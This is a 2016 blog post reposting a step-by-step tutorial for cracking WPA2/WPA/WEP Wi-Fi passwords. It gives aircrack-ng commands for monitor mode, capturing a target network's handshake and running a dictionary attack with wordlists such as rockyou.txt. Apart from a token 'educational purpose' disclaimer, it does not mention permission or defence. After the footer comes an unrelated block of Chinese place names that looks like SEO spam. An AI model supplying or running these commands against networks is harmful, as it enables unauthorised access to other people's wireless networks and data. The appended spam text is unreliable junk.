paulwong

          Hack a Wifi Network WPA2/WPA/WEP

          First of all you will need a Linux operating system & a little education about Python
          programming.
          You can install Linux operating system on any Pc or Laptop.
          Note : This tutorial is only for eduactional purpose. The author of this pdf is not responsible for any illegal work. During installing and setting up you can loose all of your data, Do not do if you don’t know about programming.
          Device:
          Use Tp-link TL-WN722N Wifi Adapter for High gain.
          Start! Open Terminal:
          1. airmon-ng check kill
          2. airmon-ng
          3. airmon-ng start wlan0
          4. airodump-ng wlan0mon
          5. (control + c to stop)
          6. airodump-ng wlan0mon —bssid 5C:F9:6A:CD:8A:1D -c 1 -w WPA2
          7. wait for 1 minute, capture handshake
          8. aircrack-ng WPA2-01.cap -w /root/rockyou.txt
          /darkc0de
          /Wpa list 1,2,3

          darkc0de, Wpalist & rockyou.txt are the dictionaries files. You can download these from internet.
          This PDF is made by Malik Mubashir

          posted on 2016-04-05 16:53 paulwong 閱讀(481) 評論(0)  編輯  收藏 所屬分類: LINUX

          主站蜘蛛池模板: 武城县| 仁寿县| 岳阳市| 寿光市| 板桥市| 盐城市| 浦城县| 夹江县| 伊春市| 盐津县| 屏东县| 崇阳县| 四川省| 文昌市| 儋州市| 兴安县| 芒康县| 南岸区| 东源县| 新昌县| 连城县| 秦皇岛市| 河西区| 盐城市| 临西县| 龙陵县| 岳阳市| 察哈| 上蔡县| 平乡县| 开封市| 深泽县| 临沭县| 沙田区| 古田县| 漳平市| 盐城市| 高邮市| 兰西县| 淄博市| 老河口市|